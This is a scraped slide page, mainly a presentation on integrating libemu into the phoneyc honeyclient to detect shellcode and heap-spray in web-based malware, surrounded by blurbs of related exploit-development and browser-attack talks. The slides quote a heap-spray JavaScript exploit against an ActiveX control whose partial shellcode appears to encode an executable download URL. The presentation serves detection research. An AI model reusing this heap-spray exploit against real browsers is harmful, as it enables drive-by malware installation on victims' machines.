The document discusses using the libemu library to detect shellcode and heapspray in the Python honeyclient phoneyc. Libemu allows for shellcode detection using x86 instruction emulation and GetPC heuristics. The document outlines integrating libemu into phoneyc to defend browsers against drive-by downloads and heap-spraying code injection attacks in web-based malware.
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEFMichele Orru
This document discusses using the Browser Exploitation Framework (BeEF) and inter-protocol exploitation techniques to gain control of victim browsers. It begins with an overview of traditional browser attack vectors and their limitations. It then introduces BeEF and how it can be used to hook victim browsers through XSS and control them remotely with JavaScript. The document proposes revitalizing inter-protocol exploitation techniques to bypass cross-domain restrictions and allow executing commands on the victim's machine. It presents the design of a new BeEF Bind shellcode that sets up a web server to accept commands and control a process like cmd.exe on the victim internally without needing an outbound connection.
Exploit Research and Development Megaprimer: Unicode Based Exploit DevelopmentAjin Abraham
Exploit Research and Development Megaprimer
http://opensecurity.in/exploit-research-and-development-megaprimer/
http://www.youtube.com/playlist?list=PLX3EwmWe0cS_5oy86fnqFRfHpxJHjtuyf
This document provides an overview of shellcode mastering techniques. It discusses the basics of shellcode including features, types, and development tasks. It covers basic shellcode techniques like call/ret algorithms and delta offset approaches. Optimization techniques are analyzed like instruction format optimizations, register value reusing, and avoiding the stack. An example analysis is given of the evolution of smaller shellcodes over time in a shellcode size competition. Hands-on labs are described to practice skills like addressing variables, using strings, and finding Windows API entry points. Required tools are listed for the labs including debuggers and assemblers.
Hacking school computers for fun profit and better grades shortVincent Ohprecio
The document discusses various topics related to hacking including motivations, methodologies, and tools. It describes how hackers conduct reconnaissance on targets, develop exploits, execute exploits, and maintain access. Specific hacking methods like fuzzing, malware kits, and shellcode are explained. Potential targets mentioned include students, faculty computers, wireless networks, and websites. The document also provides biographical information about the author and recommends books and resources for hacking.
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013midnite_runr
Patching Windows Executives with the Backdoor Factory is a presentation about binary patching techniques. It discusses the history of patching, how key generators and Metasploit patch binaries, and how the author learned to manually patch binaries. The presentation then introduces the Backdoor Factory tool, which can automatically patch Windows binaries by injecting shellcode into code caves. It demonstrates patching via code cave insertion, single cave jumps, and cave jumping. Mitigations like self-validation and antivirus are discussed.
The document discusses analyzing malicious PDF files. It describes decompressing PDFs using PDFTK to extract JavaScript. JavaScript is analyzed using a JavaScript emulator like SpiderMonkey to deobfuscate code. Any shellcode is reformed from Unicode and analyzed using Sctest for its behavior. The document provides examples of analyzing sample PDFs, extracting JavaScript, decompressing streams, and inspecting shellcode payloads. Analysis steps and tools used are explained to help understand how malicious PDF files work and discover embedded exploits.
Exploit Research and Development Megaprimer: Win32 EgghunterAjin Abraham
Exploit Research and Development Megaprimer
http://opensecurity.in/exploit-research-and-development-megaprimer/
http://www.youtube.com/playlist?list=PLX3EwmWe0cS_5oy86fnqFRfHpxJHjtuyf
One Shellcode to Rule Them All: Cross-Platform ExploitationQuinn Wilton
As the internet of things becomes less a buzzword, and more a reality, we're noticing that it's growing increasingly common to see embedded software which runs across different architectures -whether that's the same router firmware running across different models, or the operating system for a smart TV being used by different manufacturers. In a world where even your toaster might have internet access, we suspect that the ability to write cross-platform shellcode is going transition from being a merely neat trick, to a viable tool for attackers.
Writing cross-platform shellcode is tough, but there's a few techniques you can use to simplify the problem. We discuss one such method, which we used to great success during the DEFCON CTF qualifiers this year.
Presented by Tinfoil Security founder Michael Borohovski and engineer Shane Wilton at Secuinside 2014, in Seoul.
https://www.tinfoilsecurity.com/blog/cross-platform-exploitation
This is a presentation I put together and presented for my colleagues at IBM back in 2006. I started on the section featuring heap exploits and never finished it. I want to finish it someday.
The document discusses exploiting a buffer overflow vulnerability in Internet Explorer's VML implementation (MS06-055) to execute arbitrary code. It describes overwriting the structured exception handler to gain control of the instruction pointer, using heap spraying to load a buffer in memory, and having the instruction pointer jump to the buffer to execute shellcode and spawn a command shell. Metasploit is introduced as an open-source framework for developing exploits.
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...Michele Orru
Browser exploits are a primary attack vector to compromise a victims internal network, but they have major restrictions including; limited current browser exploits; the huge price for 0-day browser exploits; and exploit complexity due to sandboxing. So, instead of exploiting the victims browser, what if the victims browser exploited internal systems for you?
The new "BeEF Bind Exploit Proxy" module does this! This BeEF (Browser Exploitation Framework) module will allow penetration testers to proxy exploits through a victims web browser to compromise internal services. Not only this, but the new "BeEF Bind" shellcode also enables the communication channel to the attacker to pass back through the existing browser session.
This attack technique (Inter-protocol Exploitation) removes browser-based attacks from being dependent upon browser vulnerabilities. It increases the number of potential exploits to include many service vulnerabilities throughout the internal corporate network. This includes whatever service can be contacted via a browser request. This increases the success rate of client-side exploitation attempts by dramatically increasing the number of vulnerabilities accessible to the attacker.
So how does the new BeEF Bind Exploit Proxy work? BeEF is configured to use the BeEF Bind Exploit Proxy, and is set as the payload for XSS exploits or Phishing attacks. Once the victim visits the malicious site, their web browser becomes hooked and performs JavaScript port scanning across the internal corporate network looking for chosen open ports. Once a server has been identified, the BeEF server is notified and begins to send exploits through the hooked web browser to the service on the internal server. Each of these exploits are configured to use the new BeEF Bind shellcode.
Once an exploit has successfully triggered a vulnerability within the internal service, the BeEF Bind shellcode is executed. This shellcode is designed to setup a web-listener that proxies commands through to a shell on the compromised server. This allows the attacker to send commands through the hooked web browser to the BeEF Bind payload. The command is executed on the compromised server and returned to the web browser in HTTP responses. The hooked web browser is then able to receive the command output and proxy it back to the attacker at the BeEF server.
Penetration testers can now inject steroids into their XSS exploits by replacing simple alert boxes with demonstrations of actual compromised internal machines. They can also now increase the scope and success rate of their Phishing attacks to compromise internal servers. This new approach also minimizes the likelihood of IDS/IPS detection, and does not require an additional socket open back to the attacker via the firewall.
This document discusses Cisco IOS shellcoding and reverse engineering. It covers topics like Cisco IOS shellcodes that are image-independent by disassembling or interrupting hijacking. It also discusses Tcl shellcodes, Cisco IOS reverse engineering challenges including lack of modularity and APIs. The document details subsystems, registries, processes, command parser tree, debugging Cisco IOS, and magic numbers used in Cisco IOS.
This document discusses various low-level exploits, beginning with creating shellcode by extracting opcodes from a compiled C program. It then covers stack-based buffer overflows, including return-to-stack exploits and return-to-libc. Next it discusses heap overflows using the unlink technique, integer overflows, and format string vulnerabilities. The document provides code examples and explanations of the techniques.
Hat Secure Training
By Danang Heriyadi.
[SHARE] Courses Linux Exploit Research 2012
- Purpose of the Course
- Introducing Vulnerability Software
- Register Processor
- Intruksi Assembly
- Buffer Overflows
- Shellcode
- Exploit
- Stack & Heap
- Basic Buffer Overflow
- Basic Stack Overflows with Linux
- Smashing stack for fun and profit
- Basic shellcode development
- DTORS Exploitation
- Heap corruption and exploitation
Register :
http://hatsecure.com/exploit
This talk describes the current state of the Veil-Framework and the different tools included in it such as Veil-Evasion, Veil-Catapult, Veil-Powerview, Veil-Pillage, Veil-Ordnance
Slides for a college course at City College San Francisco. Based on "The Shellcoder's Handbook: Discovering and Exploiting Security Holes ", by Chris Anley, John Heasman, Felix Lindner, Gerardo Richarte; ASIN: B004P5O38Q.
Instructor: Sam Bowne
Class website: https://samsclass.info/127/127_S17.shtml
Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...Stephan Chenette
This document summarizes a presentation on detecting web browser heap corruption attacks. The presentation focuses on research into detecting these attacks and an internal tool called "xmon" that is part of a larger system for detecting malicious web content. The document provides background on heap corruption vulnerabilities and exploits, and how techniques like heap spraying and heap feng shui have increased the reliability of such exploits. It then describes xmon's methods for generic detection of exploit techniques through actions like patching virtual function calls and hooking structured exception handlers.
EkoParty 2010: iPhone Rootkit? There's an App for that.Eric Monti
This document discusses a proof of concept iPhone rootkit developed by reverse engineering the JailbreakMe exploit and jailbreak tools. It describes patching the tools to remove security checks and pop-ups, and preparing a custom "wad.bin" filesystem containing backdoored system utilities and apps to enable remote access and control of an infected device without the user's knowledge. A demo is proposed using a Ruby Sinatra server to serve the exploit to a vanilla iOS device and install the rootkit via the existing JailbreakMe vulnerability. The rootkit aims to remain hidden using techniques like disguising process names and removing GUI indicators of running services.
Toorcon Seattle 2011 - Browser Exploit PacksAditya K Sood
The document discusses browser exploit packs and related tactics. It provides an overview of the generic browser exploit pack framework, including how it fingerprints the victim environment, supports exploit delivery through JavaScript and DOM objects, and triggers exploits. It then covers specific tactics used in browser exploit packs, such as plugin detection and verification, string obfuscation, user agent fingerprinting, and drive-by downloads. The document concludes with a discussion of future work analyzing malware domains and hacking techniques.
Flash security past_present_future_final_enSunghun Kim
The document discusses a vulnerability in the ActionScript Virtual Machine 2 (AVM2) bytecode verifier that was discovered in October 2012. By examining the open source Tamarin project code, which implements AVM2, the author found that a bounds check on local register parameters was incorrectly omitted from the bytecode verification of declocal and inclocal opcodes. This omission allowed arbitrary register values to be used, potentially leading to code execution. The vulnerability was introduced in November 2011 by moving the bounds check to within an #ifdef block that is never executed in the released Flash Player.
Dmitriy evdokimov. light and dark side of code instrumentationYury Chemerkin
This document discusses code instrumentation techniques. It begins by introducing the speaker and defining instrumentation as adding extra code to a program or environment for monitoring or changing program behavior. It then covers various uses of instrumentation including debugging, testing, profiling, and security applications like malware analysis. The document categorizes instrumentation approaches as static, load-time, or dynamic depending on when the instrumentation is applied. It provides examples of instrumentation for different programming languages and environments like Java, .NET, and ActionScript.
This document provides an overview of zero-day vulnerabilities and techniques for discovering them, including source code auditing and fuzzing. It discusses identifying entry points, input validations, and vulnerable functions by analyzing source code. Fuzzing is introduced as providing invalid or unexpected data to test for crashes or failures. Common fuzzing methods and the fuzzing lifecycle are outlined. Specific tools for source code auditing like RIPS and fuzzing like JBroFuzz are also mentioned.
Similar to Shellcode and heapspray detection in phoneyc (6)
Project management Course in Australia.pptxdeathreaper9
Project Management Course
Over the past few decades, organisations have discovered something incredible: the principles that lead to great success on large projects can be applied to projects of any size to achieve extraordinary success. As a result, many employees are expected to be familiar with project management techniques and how they apply them to projects.
https://projectmanagementcoursesonline.au/
TrustArc Webinar - Innovating with TRUSTe Responsible AI CertificationTrustArc
In a landmark year marked by significant AI advancements, it’s vital to prioritize transparency, accountability, and respect for privacy rights with your AI innovation.
Learn how to navigate the shifting AI landscape with our innovative solution TRUSTe Responsible AI Certification, the first AI certification designed for data protection and privacy. Crafted by a team with 10,000+ privacy certifications issued, this framework integrated industry standards and laws for responsible AI governance.
This webinar will review:
- How compliance can play a role in the development and deployment of AI systems
- How to model trust and transparency across products and services
- How to save time and work smarter in understanding regulatory obligations, including AI
- How to operationalize and deploy AI governance best practices in your organization
The Hilarious Saga of Ships Losing Their Voices: these gigantic vessels that rule the seas can't even keep track of themselves without our help. When their beloved AIS system fails, they're rendered blind, deaf and dumb - a cruel joke on their supposed maritime prowess.
This document, in its grand ambition, seeks to dissect the marvel that is maritime open-source intelligence (maritime OSINT). Real-world case studies will be presented with the gravitas of a Shakespearean tragedy, illustrating the practical applications and undeniable benefits of maritime OSINT in various security scenarios.
For the cybersecurity professionals and maritime law enforcement authorities, this document will be nothing short of a revelation, equipping them with the knowledge and tools to navigate the complexities of maritime OSINT operations while maintaining a veneer of ethical and legal propriety. Researchers, policymakers, and industry stakeholders will find this document to be an indispensable resource, shedding light on the potential and implications of maritime OSINT in safeguarding our seas and ensuring maritime security and safety.
-------------------------
This document aims to provide a comprehensive analysis of maritime open-source intelligence (maritime OSINT) and its various aspects: examining the ethical implications of employing maritime OSINT techniques, particularly in the context of maritime law enforcement authorities, identifying and addressing the operational challenges faced by maritime law enforcement authorities when utilizing maritime OSINT, such as data acquisition, analysis, and dissemination.
The analysis will offer a thorough and insightful examination of these aspects, providing a valuable resource for cybersecurity professionals, law enforcement agencies, maritime industry stakeholders, and researchers alike. Additionally, the document will serve as a valuable resource for researchers, policymakers, and industry stakeholders seeking to understand the potential and implications of maritime OSINT in ensuring maritime security and safety.
Maritime Open-Source Intelligence (OSINT) refers to the practice of gathering and analyzing publicly available information related to maritime activities, vessels, ports, and other maritime infrastructure for intelligence purposes. It involves leveraging various open-source data sources and tools to monitor, track, and gain insights into maritime operations, potential threats, and anomalies. Maritime Open-Source Intelligence (OSINT) is crucial for capturing information critical to business operations, especially when electronic systems like Automatic Identification Systems (AIS) fail. OSINT can provide valuable context and insights into vessel operations, including the identification of vessels, their positions, courses, and speeds
A. Data Sources
• Vessel tracking websites and services (e.g., MarineTraffic, VesselFinder) that provide real-time and historical data on ship movements, positions, and d
Jacquard Fabric Explained: Origins, Characteristics, and Usesldtexsolbl
In this presentation, we’ll dive into the fascinating world of Jacquard fabric. We start by exploring what makes Jacquard fabric so special. It’s known for its beautiful, complex patterns that are woven into the fabric thanks to a clever machine called the Jacquard loom, invented by Joseph Marie Jacquard back in 1804. This loom uses either punched cards or modern digital controls to handle each thread separately, allowing for intricate designs that were once impossible to create by hand.
Next, we’ll look at the unique characteristics of Jacquard fabric and the different types you might encounter. From the luxurious brocade, often used in fancy clothing and home décor, to the elegant damask with its reversible patterns, and the artistic tapestry, each type of Jacquard fabric has its own special qualities. We’ll show you how these fabrics are used in everyday items like curtains, cushions, and even artworks, making them both functional and stylish.
Moving on, we’ll discuss how technology has changed Jacquard fabric production. Here, LD Texsol takes center stage. As a leading manufacturer and exporter of electronic Jacquard looms, LD Texsol is helping to modernize the weaving process. Their advanced technology makes it easier to create even more precise and complex patterns, and also helps make the production process more efficient and environmentally friendly.
Finally, we’ll wrap up by summarizing the key points and highlighting the exciting future of Jacquard fabric. Thanks to innovations from companies like LD Texsol, Jacquard fabric continues to evolve and impress, blending traditional techniques with cutting-edge technology. We hope this presentation gives you a clear picture of how Jacquard fabric has developed and where it’s headed in the future.
The Challenge of Interpretability in Generative AI Models.pdfSara Kroft
Navigating the intricacies of generative AI models reveals a pressing challenge: interpretability. Our blog delves into the complexities of understanding how these advanced models make decisions, shedding light on the mechanisms behind their outputs. Explore the latest research, practical implications, and ethical considerations, as we unravel the opaque processes that drive generative AI. Join us in this insightful journey to demystify the black box of artificial intelligence.
Dive into the complexities of generative AI with our blog on interpretability. Find out why making AI models understandable is key to trust and ethical use and discover current efforts to tackle this big challenge.
Generative AI technology is a fascinating field that focuses on creating comp...Nohoax Kanont
Generative AI technology is a fascinating field that focuses on creating computer models capable of generating new, original content. It leverages the power of large language models, neural networks, and machine learning to produce content that can mimic human creativity. This technology has seen a surge in innovation and adoption since the introduction of ChatGPT in 2022, leading to significant productivity benefits across various industries. With its ability to generate text, images, video, and audio, generative AI is transforming how we interact with technology and the types of tasks that can be automated.
Securiport Gambia is a civil aviation and intelligent immigration solutions provider founded in 2001. The company was created to address security needs unique to today’s age of advanced technology and security threats. Securiport Gambia partners with governments, coming alongside their border security to create and implement the right solutions.
Selling software today doesn’t look anything like it did a few years ago. Especially software that runs inside a customer environment. Dreamfactory has used Anchore and Ask Sage to achieve compliance in a record time. Reducing attack surface to keep vulnerability counts low, and configuring automation to meet those compliance requirements. After achieving compliance, they are keeping up to date with Anchore Enterprise in their CI/CD pipelines.
The CEO of Ask Sage, Nic Chaillan, the CEO of Dreamfactory Terence Bennet, and Anchore’s VP of Security Josh Bressers are going to discuss these hard problems.
In this webinar we will cover:
- The standards Dreamfactory decided to use for their compliance efforts
- How Dreamfactory used Ask Sage to collect and write up their evidence
- How Dreamfactory used Anchore Enterprise to help achieve their compliance needs
- How Dreamfactory is using automation to stay in compliance continuously
- How reducing attack surface can lower vulnerability findings
- How you can apply these principles in your own environment
When you do security right, they won’t know you’ve done anything at all!
Airports, banks, stock exchanges, and countless other critical operations got thrown into chaos!
In an unprecedented event, a recent CrowdStrike update had caused a global IT meltdown, leading to widespread Blue Screen of Death (BSOD) errors, and crippling 8.5 million Microsoft Windows systems.
What triggered this massive disruption? How did Microsoft step in to provide a lifeline? And what are the next steps for recovery?
Swipe to uncover the full story, including expert insights and recovery steps for those affected.
Understanding the NFT marketplace ecosystem involves exploring platforms for creating, buying, selling, and trading digital assets. These platforms use blockchain technology for security and smart contracts for automated transactions. Key components include digital wallets, NFT standards, and marketplaces like OpenSea and Rarible. This ecosystem is shaped by the roles of creators, collectors, and developers, offering insights into the dynamics and trends of the digital asset economy.
Global Collaboration for Space Exploration.pdfSachin Chitre
Distinguished readers, leaders, esteemed colleagues, and fellow dreamers,
We stand at the precipice of a new era, an epoch where the boundaries of human potential are poised to be redefined. For centuries, humanity has gazed up at the celestial expanse, yearning to explore the cosmic mysteries that beckon us.
Today, I present a vision, a blueprint for a journey that transcends the limitations of conventional science and technology.
Imagine a world where the shackles of gravity are broken, where interstellar travel is no longer confined to the realms of science fiction. A world united not by petty differences, but by a shared purpose – to explore, to discover, and to elevate humanity.
This presentation outlines a comprehensive research project to construct and deploy Vimanas – ancient, aerial vehicles of wisdom and power. By harnessing the knowledge of our ancestors and the advancements of modern science, we can embark on a quest to not only conquer the skies but to conquer the cosmos.
Let us together ignite the spark of human ingenuity and propel our civilization towards a future where the stars are within our reach and where the bonds of humanity are strengthened through shared exploration.
The time for action is now. Let us embark on this extraordinary journey together."
Multimodal Embeddings (continued) - South Bay Meetup SlidesZilliz
Frank Liu will walk through the history of embeddings and how we got to the cool embedding models used today. He'll end with a demo on how multimodal RAG is used.
IT market in Israel, economic background, forecasts of 160 categories and the infrastructure and software products in those categories, professional services also. 710 vendors are ranked in 160 categories.
Flame emission spectroscopy is an instrument used to determine concentration of metal ions in sample. Flame provide energy for excitation atoms introduced into flame. It involve components like sample delivery system, burner, sample, mirror, slits, monochromator, filter, detector (photomultiplier tube and photo tube detector). There are many interference involved during analysis of sample like spectral interference, ionisation interference, chemical interference ect. It can be used for both quantitative and qualitative study, determine lead in petrol, determine alkali and alkaline earth metal, determine fertilizer requirement for soil.
1. phoneyc with
libemu
Z. Chen
phoneyc
WB Malware .
.
Libemu Shellcode and heapspray detection in phoneyc
Tracing JS .
.. .
.
Basic Principles
SCDetection
Basic Idea
Details
Zhijie Chen1
Source Files
Implementation
1 Honeynet Project Chinese Chapter
HS Detection
Current
Results
Honeynet Project on Google Summer of Code, 2009
JoYAN . . . . . .
2. Contents
phoneyc with
libemu .
Z. Chen
..
1 Introduction to phoneyc
.
phoneyc ..
2 A Typical Web-Based Malware
WB Malware .
Libemu
..
3 Shellcode detection using Libemu
.
Tracing JS
Basic Principles
..
4 Tracing Mozilla Spidermonkey
SCDetection
Basic Principles of Spidermonkey
Basic Idea
.
Details
Source Files . . Shellcode Detection in phoneyc
5
Implementation Basic Idea
HS Detection
Details
Current
Results Related Source files
Implementation
.
. . Heapspray Detection
6
.
. . Current Results
JoYAN
7
2
3. Contents
phoneyc with
libemu .
Z. Chen
..
1 Introduction to phoneyc
.
phoneyc ..
2 A Typical Web-Based Malware
WB Malware .
Libemu
..
3 Shellcode detection using Libemu
.
Tracing JS
Basic Principles
..
4 Tracing Mozilla Spidermonkey
SCDetection
Basic Principles of Spidermonkey
Basic Idea
.
Details
Source Files . . Shellcode Detection in phoneyc
5
Implementation Basic Idea
HS Detection
Details
Current
Results Related Source files
Implementation
.
. . Heapspray Detection
6
.
. . Current Results
JoYAN
7
3
4. Introduction to phoneyc
phoneyc with
libemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS http://code.google.com/p/phoneyc/
Basic Principles
SCDetection
A python honeyclient
Basic Idea
Details Original written by Jose Nazario.
Source Files
Implementation To detect Web-based Malware
HS Detection
Current
Results
JoYAN 4
5. Contents
phoneyc with
libemu .
Z. Chen
..
1 Introduction to phoneyc
.
phoneyc ..
2 A Typical Web-Based Malware
WB Malware .
Libemu
..
3 Shellcode detection using Libemu
.
Tracing JS
Basic Principles
..
4 Tracing Mozilla Spidermonkey
SCDetection
Basic Principles of Spidermonkey
Basic Idea
.
Details
Source Files . . Shellcode Detection in phoneyc
5
Implementation Basic Idea
HS Detection
Details
Current
Results Related Source files
Implementation
.
. . Heapspray Detection
6
.
. . Current Results
JoYAN
7
5
6. A Typical Heapspray Mal-javascript I
phoneyc with
libemu
1 <body>
Z. Chen
<script>window.onerror=function(){return true;}</script>
phoneyc
<object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2"
style=’display:none’ id=’target’></object>
WB Malware
<SCRIPT language="javascript">
Libemu
6 var shellcode = unescape("%u9090"+"%u9090"+
Tracing JS ...(shellcode)
Basic Principles
"%u7468%u7074%u2f3a%u312f%u3176%u6e2e%u6d61%u2f65%u6573%u7672
SCDetection
Basic Idea %u7265%u652e%u6578%u0000");
Details </script>
Source Files
Implementation <SCRIPT language="javascript">
HS Detection 11 var bigblock = unescape("%u9090%u9090");
Current var headersize = 20;
Results var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
16 block = bigblock.substring(0, bigblock.length−slackspace);
while(block.length+slackspace<0x40000)
JoYAN
block = block+block+fillblock;
6
7. A Typical Heapspray Mal-javascript II
phoneyc with
libemu memory = new Array();
Z. Chen
for (x=0; x<100; x++) memory[x] = block +shellcode;
21 var buffer = ’’;
phoneyc while (buffer.length < 1024) buffer+="x05";
WB Malware var ok="1111";
Libemu target.Register(ok,buffer);
Tracing JS
</script>
Basic Principles 26 </body>
SCDetection
Basic Idea
Details
Source Files
Implementation
HS Detection
Current
Results
JoYAN 7
8. Heap Status After Heapspray
phoneyc with
libemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS
Basic Principles
| More than ??MB 0x90(NOP)s or some other x86 instructions
SCDetection
Basic Idea as a sledge | Shellcode |
Details
Source Files
Implementation
HS Detection
Current
Results
JoYAN 8
9. Detecting Shellcode/Heapspray
phoneyc with
libemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS
Basic Principles
SCDetection
SC/HS Detecting Tool: How To Detect It?
Basic Idea
Details
Source Files
Implementation
HS Detection
Current
Results
JoYAN 9
10. Contents
phoneyc with
libemu .
Z. Chen
..
1 Introduction to phoneyc
.
phoneyc ..
2 A Typical Web-Based Malware
WB Malware .
Libemu
..
3 Shellcode detection using Libemu
.
Tracing JS
Basic Principles
..
4 Tracing Mozilla Spidermonkey
SCDetection
Basic Principles of Spidermonkey
Basic Idea
.
Details
Source Files . . Shellcode Detection in phoneyc
5
Implementation Basic Idea
HS Detection
Details
Current
Results Related Source files
Implementation
.
. . Heapspray Detection
6
.
. . Current Results
JoYAN
7
10
11. Introduction to libemu
phoneyc with
libemu
Z. Chen
.
phoneyc From it’s official site: .
WB Malware
..
libemu is a small library written in c offering basic x86
Libemu
emulation and shellcode detection using GetPC heuristics.
Tracing JS
Basic Principles Using libemu one can:
SCDetection
Basic Idea
detect shellcodes
Details
Source Files execute the shellcodes
Implementation
HS Detection . profile shellcode behaviour
.. .
.
Current
Results Using libemu to detect shellcode and heapspray in web-based
malware: ¡¡Defending browsers against drive-by downloads:
Mitigating heap-spraying code injection attacks¿¿)
JoYAN 11
12. Detecting x86 Instructions
phoneyc with
libemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS
Basic Principles
SCDetection
SC/HS Detecting Time: When To Detect It?
Basic Idea
Details
Source Files
Implementation
HS Detection
Current
Results
JoYAN 12
13. Contents
phoneyc with
libemu .
Z. Chen
..
1 Introduction to phoneyc
.
phoneyc ..
2 A Typical Web-Based Malware
WB Malware .
Libemu
..
3 Shellcode detection using Libemu
.
Tracing JS
Basic Principles
..
4 Tracing Mozilla Spidermonkey
SCDetection
Basic Principles of Spidermonkey
Basic Idea
.
Details
Source Files . . Shellcode Detection in phoneyc
5
Implementation Basic Idea
HS Detection
Details
Current
Results Related Source files
Implementation
.
. . Heapspray Detection
6
.
. . Current Results
JoYAN
7
13
14. Introduction to spidermonkey
phoneyc with
libemu
Z. Chen
phoneyc
WB Malware
Libemu
.
Tracing JS What is SpiderMonkey? .
Basic Principles ..
SCDetection
SpiderMonkey is the code-name for the Mozilla’s C
Basic Idea
Details
implementation of
Source Files
Implementation
JavaScript.(http://www.mozilla.org/js/spidermonkey/)
.
.. .
.
HS Detection
Current
Results
JoYAN 14
15. Basic Principles of Spidermonkey
phoneyc with
libemu
Z. Chen
phoneyc
WB Malware
Libemu
All the javascript sources are compiled into js bytecodes.
Tracing JS
Basic Principles There is an interpreter who interprets the bytecodes and
SCDetection
Basic Idea
do certain simple actions.
Details
Source Files All the javascript variables are stored as jsval.
Implementation
HS Detection Some of the values are store as an “atom”, such as strings.
Current
Results
JoYAN 15
16. Contents
phoneyc with
libemu .
Z. Chen
..
1 Introduction to phoneyc
.
phoneyc ..
2 A Typical Web-Based Malware
WB Malware .
Libemu
..
3 Shellcode detection using Libemu
.
Tracing JS
Basic Principles
..
4 Tracing Mozilla Spidermonkey
SCDetection
Basic Principles of Spidermonkey
Basic Idea
.
Details
Source Files . . Shellcode Detection in phoneyc
5
Implementation Basic Idea
HS Detection
Details
Current
Results Related Source files
Implementation
.
. . Heapspray Detection
6
.
. . Current Results
JoYAN
7
16
17. Basic Idea
phoneyc with
libemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS
As both the shellcode manipulation and the spraying of the
Basic Principles fillblock involve assignments. The shellcode will be detected
SCDetection
Basic Idea
immediately on it’s assignment if we are able to interrupt
Details
Source Files
spidermonkey at the interpretion of certain bytecodes related to
Implementation an assignment and check its argments and values for shellcodes.
HS Detection
Current
Results
JoYAN 17
18. Details I
phoneyc with
libemu
Z. Chen
The following js codes:
phoneyc
function a(){b="c"; var a = 0;}
WB Malware
Libemu are compiled into bytecodes like:
Tracing JS
Basic Principles
00000: bindname "b"
SCDetection 00003: string "c"
Basic Idea 00006: setname "b"
Details
Source Files 4 00009: pop
Implementation 00010: zero
HS Detection 00011: setvar 0
Current 00014: pop
Results
00015: stop
So, if we examine the set* opcodes’ arguments on the top of
the stack in runtime, shellcodes won’t get passed!
JoYAN 18
19. Details
phoneyc with
libemu
Z. Chen
phoneyc
To do so, we need to:
WB Malware
Libemu Step trace the spidermonkey runtime.
Tracing JS Stop at the key bytecodes (such as setname, setvar,
Basic Principles
SCDetection
setprop, setarg etc.) on all kinds of
Basic Idea
Details
assignments.Unfortunately different assignments have
Source Files
Implementation
different bytecode accordingly.
HS Detection But all the opcodes related to assignments share a
Current JOF SET bit in their opcode description
Results
structure(./src/jsopcode.h).
JoYAN 19
20. Related Source files to be used later
phoneyc with
libemu
Z. Chen
phoneyc
WB Malware
Libemu
jsapi.h:Basic APIs for javascript execution.
Tracing JS
Basic Principles jsdbgapi.h:Basic APIs for debugging spidermonkey.
SCDetection
Basic Idea jsopcode.tbl:All the js opcodes(bytecodes).
Details
Source Files
Implementation
jsinterp.c:You can find how each bytecode is interpreted
HS Detection here.
Current
Results
JoYAN 20
21. Implementation
phoneyc with
libemu
Z. Chen Register a trace handler into spidermonkey using
phoneyc
JS SetInterrupt. This handler will be called at each step
WB Malware
of the bytecode execution.
Libemu In the handler:
Tracing JS Use JS GetTrapOpcode to get current
Basic Principles
opcode(bytecode).
SCDetection
Basic Idea
Use JS FrameIterator to get current runtime stack.
Details Check the rvalue of the set* bytecodes on the top of the
Source Files
Implementation stack with libemu.
HS Detection Dump the shellcodes and alert.
Current Contine the execution.
Results
Privide this traced js virtual as a python module named
honeyjs, so other part of phoneyc can use this module just
the same as python-spidermonkey with optional awareness
of the extra shellcode/heapspray detection APIs.
JoYAN 21
22. Contents
phoneyc with
libemu .
Z. Chen
..
1 Introduction to phoneyc
.
phoneyc ..
2 A Typical Web-Based Malware
WB Malware .
Libemu
..
3 Shellcode detection using Libemu
.
Tracing JS
Basic Principles
..
4 Tracing Mozilla Spidermonkey
SCDetection
Basic Principles of Spidermonkey
Basic Idea
.
Details
Source Files . . Shellcode Detection in phoneyc
5
Implementation Basic Idea
HS Detection
Details
Current
Results Related Source files
Implementation
.
. . Heapspray Detection
6
.
. . Current Results
JoYAN
7
22
23. Basic Idea
phoneyc with
libemu
Z. Chen
phoneyc
WB Malware
Libemu .
Tracing JS Heapspray .
Basic Principles
..
A myriad of NOP-like x86 instructions
SCDetection
Basic Idea
Details
Accumulating through a loop of assignments
Source Files
Implementation . Shellcode in the end of each sledge
.. .
.
HS Detection
Current
Results
JoYAN 23
24. Basic Idea
phoneyc with
libemu
Z. Chen
phoneyc .
Heapspray .
WB Malware ..
Libemu
A myriad of NOP-like x86 instructions
Tracing JS Accumulating through a loop of assignments
Basic Principles
SCDetection . Shellcode in the end of each sledge
.. .
.
Basic Idea
Details
Source Files
.
Implementation Detection .
..
HS Detection Now: A variable counter to record the mal-assignments
Current
Results
(assignments containing shellcode in the r-value).
. In the future: entropy ? the nozzle way?
.. .
.
JoYAN 24
25. Contents
phoneyc with
libemu .
Z. Chen
..
1 Introduction to phoneyc
.
phoneyc ..
2 A Typical Web-Based Malware
WB Malware .
Libemu
..
3 Shellcode detection using Libemu
.
Tracing JS
Basic Principles
..
4 Tracing Mozilla Spidermonkey
SCDetection
Basic Principles of Spidermonkey
Basic Idea
.
Details
Source Files . . Shellcode Detection in phoneyc
5
Implementation Basic Idea
HS Detection
Details
Current
Results Related Source files
Implementation
.
. . Heapspray Detection
6
.
. . Current Results
JoYAN
7
25
26. A Run on ssreader 0day.html I
phoneyc with
libemu joyan@Jdeb:˜/code/phoneyc$ sh go.sh
Z. Chen 2 HONEYCLIENT MODULE TEST
fetching http://172.31.25.227/phoneyc/ssreader 0day.html
phoneyc
[]
WB Malware
==> http://172.31.25.227/phoneyc/ssreader 0day.html
Libemu JS EVAL
Tracing JS 7 Executing Javascript:
Basic Principles
DEBUG: !!!SC DETECTED at 141847268=141847572size:374
SCDetection
DEBUG: !!!SC DETECTED at 141847524=141847756size:32728
Basic Idea
Details DEBUG: !!!SC DETECTED at 141723488=141847756size:32728
Source Files
Implementation
DEBUG: !!!SC DETECTED at 141723488=141847756size:32728
HS Detection 12
...
Current
Results
DEBUG: !!!SC DETECTED at 141723488=141847756size:32728
SSReader Pdg2 Register method overflow
